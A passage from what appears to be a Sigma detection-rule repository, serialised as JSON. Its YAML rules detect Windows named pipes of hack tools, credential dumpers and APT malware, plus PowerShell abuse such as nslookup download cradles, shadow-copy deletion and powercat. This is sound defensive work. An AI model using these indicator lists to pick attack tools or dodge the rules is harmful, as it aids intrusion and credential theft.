    "content": "title: HackTool - DiagTrackEoP Default Named Pipe\nid: 1f7025a6-e747-4130-aac4-961eb47015f1\nstatus: test\ndescription: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses \"SeImpersonate\" privilege.\nreferences:\n    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-03\nmodified: 2023-08-07\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: 'thisispipe' # Based on source code\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_efspotato.yml",
    "content": "title: HackTool - EfsPotato Named Pipe Creation\nid: 637f689e-b4a5-4a86-be0e-0100a0a33ba2\nstatus: test\ndescription: Detects the pattern of a pipe name as used by the hack tool EfsPotato\nreferences:\n    - https://twitter.com/SBousseaden/status/1429530155291193354?s=20\n    - https://github.com/zcgonvh/EfsPotato\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-12-21\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains:\n            - '\\pipe\\'\n            - '\\pipe\\srvsvc'  # more specific version (use only this one if the other causes too many false positives)\n    filter_optional_ctx:\n        PipeName|contains: '\\CtxShare'\n    filter_optional_default:\n        PipeName|startswith: '\\pipe\\' # excludes pipes that start with \\pipe\\*\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - \\pipe\\LOCAL\\Monitorian # https://github.com/emoacht/Monitorian\nlevel: high\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml",
    "content": "title: HackTool - Credential Dumping Tools Named Pipe Created\nid: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e\nstatus: test\ndescription: Detects well-known credential dumping tools execution via specific named pipe creation\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-11-01\nmodified: 2023-08-07\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains:\n            - '\\cachedump'\n            - '\\lsadump'\n            - '\\wceservicepipe'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using tool for password recovery\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml",
    "content": "title: HackTool - Koh Default Named Pipe\nid: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a\nstatus: test\ndescription: Detects creation of default named pipes used by the Koh tool\nreferences:\n    - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-08\nmodified: 2023-08-07\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1528\n    - attack.t1134.001\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains:\n            - '\\imposecost'\n            - '\\imposingcost'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml",
    "content": "title: Alternate PowerShell Hosts Pipe\nid: 58cb02d5-78ce-4692-b3e1-dce850aae41a\nrelated:\n    - id: ac7102b4-9e1e-4802-9b4f-17c5524c015c\n      type: derived\nstatus: test\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\n    - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton\ndate: 2019-09-12\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? 
You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith: '\\PSHost'\n    filter_main_generic:\n        - Image|contains:\n              - ':\\Program Files\\PowerShell\\7-preview\\pwsh.exe' # Powershell 7\n              - ':\\Program Files\\PowerShell\\7\\pwsh.exe' # Powershell 7\n              - ':\\Windows\\system32\\dsac.exe'\n              - ':\\Windows\\system32\\inetsrv\\w3wp.exe'   # this is sad :,( but it triggers FPs on Exchange servers\n              - ':\\Windows\\System32\\sdiagnhost.exe'\n              - ':\\Windows\\system32\\ServerManager.exe'\n              - ':\\Windows\\system32\\wbem\\wmiprvse.exe'\n              - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n              - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n              - ':\\Windows\\System32\\wsmprovhost.exe'\n              - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n              - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n        - Image|contains|all:\n              - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n              - '\\pwsh.exe'\n        - Image|contains|all:\n              - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview'\n              - '\\pwsh.exe'\n    filter_optional_sqlserver: # Microsoft SQL Server\\130\\Tools\\\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n        Image|contains: '\\Microsoft SQL Server\\'\n        Image|endswith: '\\Tools\\Binn\\SQLPS.exe'\n    filter_optional_azure_connected_machine_agent:\n        # Azure Connected Machine Agent (https://devblogs.microsoft.com/powershell/azure-policy-guest-configuration-client/)\n        Image|startswith: 'C:\\Program Files\\AzureConnectedMachineAgent\\GCArcService'\n  
      Image|endswith: '\\GC\\gc_worker.exe'\n    filter_optional_citrix:\n        Image|startswith: 'C:\\Program Files\\Citrix\\'\n    filter_optional_exchange:\n        Image|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n    filter_main_null:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Programs using PowerShell directly without invocation of a dedicated interpreter.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml",
    "content": "title: New PowerShell Instance Created\nid: ac7102b4-9e1e-4802-9b4f-17c5524c015c\nrelated:\n    - id: 58cb02d5-78ce-4692-b3e1-dce850aae41a\n      type: derived\nstatus: test\ndescription: Detects the execution of PowerShell via the creation of a named pipe starting with PSHost\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\n    - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-09-12\nmodified: 2023-11-30\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith: '\\PSHost'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: informational\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml",
    "content": "title: PUA - CSExec Default Named Pipe\nid: f318b911-ea88-43f4-9281-0de23ede628e\nrelated:\n    - id: 9e77ed63-2ecf-4c7b-b09d-640834882028\n      type: obsolete\nstatus: test\ndescription: Detects default CSExec pipe creation\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\n    - https://github.com/malcomvetter/CSExec\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\nmodified: 2023-11-30\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: '\\csexecsvc'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml",
    "content": "title: PUA - PAExec Default Named Pipe\nid: f6451de4-df0a-41fa-8d72-b39f54a08db5\nstatus: test\ndescription: Detects PAExec default named pipe\nreferences:\n    - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md\n    - https://github.com/poweradminllc/PAExec\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: pipe_created\n    product: windows\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith: '\\PAExec'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml",
    "content": "title: PUA - RemCom Default Named Pipe\nid: d36f87ea-c403-44d2-aa79-1a0ac7c24456\nrelated:\n    - id: 9e77ed63-2ecf-4c7b-b09d-640834882028\n      type: obsolete\nstatus: test\ndescription: Detects default RemCom pipe creation\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\n    - https://github.com/kavika13/RemCom\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\nmodified: 2023-11-30\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: '\\RemCom'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml",
    "content": "title: WMI Event Consumer Created Named Pipe\nid: 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb\nstatus: test\ndescription: Detects the WMI Event Consumer service scrcons.exe creating a named pipe\nreferences:\n    - https://github.com/RiccardoAncarani/LiquidSnake\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-01\nmodified: 2023-11-30\ntags:\n    - attack.t1047\n    - attack.execution\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        Image|endswith: '\\scrcons.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml",
    "content": "title: Malicious Named Pipe Created\nid: fe3ac066-98bb-432a-b1e7-a5229cb39d4a\nstatus: test\ndescription: Detects the creation of a named pipe seen used by known APTs or malware.\nreferences:\n    - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/\n    - https://securelist.com/faq-the-projectsauron-apt/75533/\n    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\n    - https://www.us-cert.gov/ncas/alerts/TA17-117A\n    - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html\n    - https://thedfirreport.com/2020/06/21/snatch-ransomware/\n    - https://github.com/RiccardoAncarani/LiquidSnake\n    - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a\n    - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf\n    - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: Florian Roth (Nextron Systems), blueteam0ps, elhoim\ndate: 2017-11-06\nmodified: 2023-08-07\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName:\n            - '\\46a676ab7f179e511e30dd2dc41bd388'  # Project Sauron\n            - '\\583da945-62af-10e8-4902-a8f205c72b2e'  # SolarWinds SUNBURST malware\n            - '\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7'  # LiquidSnake\n            - '\\9f81f59bc58452127884ce513865ed20'  # Project Sauron\n            - '\\adschemerpc'  # Turla HyperStack\n            - '\\ahexec'  # Sofacy group malware\n            - '\\AnonymousPipe'  # Hidden Cobra Hoplight\n            - '\\bc31a7'  # Pacifier\n            - '\\bc367'  # Pacifier\n            - '\\bizkaz'  # Snatch Ransomware\n            - '\\csexecsvc' # CSEXEC default\n            - '\\dce_3d' # Qbot\n            - '\\e710f28d59aa529d6792ca6ff0ca1b34'  # Project Sauron\n            - '\\gruntsvc' # Covenant default\n            - '\\isapi_dg'  # Uroburos Malware\n            - '\\isapi_dg2'  # Uroburos Malware\n            - '\\isapi_http'  # Uroburos Malware\n            - '\\jaccdpqnvbrrxlaf' # PoshC2 default\n            - '\\lsassw'  # Wild Neutron APT malware\n            - '\\NamePipe_MoreWindows'  # Cloud Hopper - RedLeaves\n            - '\\pcheap_reuse'  # Pipe used by Equation Group malware\n            - '\\Posh*' # PoshC2 default\n            - '\\rpchlp_3'  # Project Sauron\n            - '\\sdlrpc'  # Cobra Trojan\n            - '\\svcctl' # Crackmapexec smbexec default\n            - '\\testPipe'  # Emissary Panda Hyperbro\n            - '\\winsession'  # Wild Neutron APT malware\n            # - '\\status_*' # CS default  https://github.com/SigmaHQ/sigma/issues/253\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml",
    "content": "title: PsExec Tool Execution From Suspicious Locations - PipeName\nid: 41504465-5e3a-4a5b-a5b4-2a0baadd4463\nrelated:\n    - id: f3f3a972-f982-40ad-b63c-bca6afdfad7c\n      type: derived\nstatus: test\ndescription: Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-04\nmodified: 2023-09-20\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: pipe_created\n    product: windows\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName: '\\PSEXESVC'\n        Image|contains: # Add or remove locations depending on how and if you execute Psexec in your env\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n    condition: selection\nfalsepositives:\n    - Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml",
    "content": "title: Nslookup PowerShell Download Cradle\nid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1\nrelated:\n    - id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23\n      type: similar\nstatus: test\ndescription: Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1566489367232651264\nauthor: Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam\ndate: 2022-12-10\nmodified: 2025-02-25\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'powershell'\n            - 'nslookup'\n            - '[1]'\n        Data|contains:\n            - '-q=txt http'\n            - '-querytype=txt http'\n            - '-type=txt http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml",
    "content": "title: Delete Volume Shadow Copies Via WMI With PowerShell\nid: 87df9ee1-5416-453a-8a08-e8d4a51e9ce1\nstatus: stable\ndescription: Shadow Copies deletion using operating systems utilities via PowerShell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md\n    - https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\nauthor: frack113\ndate: 2021-06-03\nmodified: 2023-10-27\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'Get-WmiObject'\n            - 'Win32_ShadowCopy'\n        Data|contains:\n            - 'Delete()'\n            - 'Remove-WmiObject'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml",
    "content": "title: PowerShell Downgrade Attack - PowerShell\nid: 6331d09b-4785-4c13-980f-f96661356249\nstatus: test\ndescription: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0\nreferences:\n    - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\nauthor: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)\ndate: 2017-03-22\nmodified: 2023-10-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'EngineVersion=2.'\n    filter_main:\n        Data|contains: 'HostVersion=2.'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml",
    "content": "title: PowerShell Called from an Executable Version Mismatch\nid: c70e019b-1479-4b65-b0cc-cd0c6093a599\nstatus: test\ndescription: Detects PowerShell called from an executable by the version mismatch method\nreferences:\n    - https://adsecurity.org/?p=2921\nauthor: Sean Metcalf (source), Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-10-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection_engine:\n        Data|contains:\n            - 'EngineVersion=2.'\n            - 'EngineVersion=4.'\n            - 'EngineVersion=5.'\n    selection_host:\n        Data|contains: 'HostVersion=3.'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_powercat.yml",
    "content": "title: Netcat The Powershell Version\nid: c5b20776-639a-49bf-94c7-84f912b91c15\nrelated:\n    - id: bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2\n      type: derived\nstatus: test\ndescription: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network\nreferences:\n    - https://nmap.org/ncat/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\nauthor: frack113\ndate: 2021-07-21\nmodified: 2023-10-27\ntags:\n    - attack.command-and-control\n    - attack.t1095\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains:\n            - 'powercat '\n            - 'powercat.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml",
    "content": "title: Remote PowerShell Session (PS Classic)\nid: 60167e5c-84b2-4c95-a7ac-86281f27c445\nrelated:\n    - id: 96b9f619-aa91-478f-bacb-c3e50f8df575\n      type: derived\nstatus: test\ndescription: Detects remote PowerShell sessions\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-10\nmodified: 2024-01-03\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains|all:\n            - 'HostName=ServerRemoteHost'\n            - 'wsmprovhost.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use remote PowerShell sessions\n# Note: Increase the level to \"medium\" in environments that do not leverage PowerShell remoting\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml",
    "content": "title: Potential RemoteFXvGPUDisablement.EXE Abuse\nid: f65e22f9-819e-4f96-9c7b-498364ae7a25\nrelated:\n    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation\n      type: similar\n    - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module\n      type: similar\n    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of  the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-13\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    service: powershell-classic\n    definition: fields have to be extract from event\ndetection:\n    selection:\n        Data|contains: 'ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml",
    "content": "title: Renamed Powershell Under Powershell Channel\nid: 30a8cb77-8eb3-4cfb-8e79-ad457c5a4592\nstatus: test\ndescription: |\n    Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Harish Segar, frack113\ndate: 2020-06-29\nmodified: 2025-01-20\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.001\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: ps_classic_start\ndetection:\n    selection:\n        Data|contains: 'HostName=ConsoleHost'\n    # Note: Powershell Logging Data is localized. Meaning that \"HostApplication\" field will be translated to a different field on a non english layout. This rule doesn't take this into account due to the sheer amount of possibilities. It's up to the user to add these cases.\n    filter_main_ps:\n        Data|contains:\n            - 'HostApplication=powershell'\n            - 'HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell'\n            - 'HostApplication=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell'\n            # In some cases powershell was invoked with inverted slashes\n            - 'HostApplication=C:/Windows/System32/WindowsPowerShell/v1.0/powershell'\n            - 'HostApplication=C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell'\n            - 'HostApplication=C:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe'\n            - 'HostApplication=C:\\\\\\\\WINDOWS\\\\\\\\SysWOW64\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe'\n    filter_main_host_application_null:\n        # Note: Since we're using the raw data field to match. There is no easy way to filter out cases where the \"HostApplication\" field is null 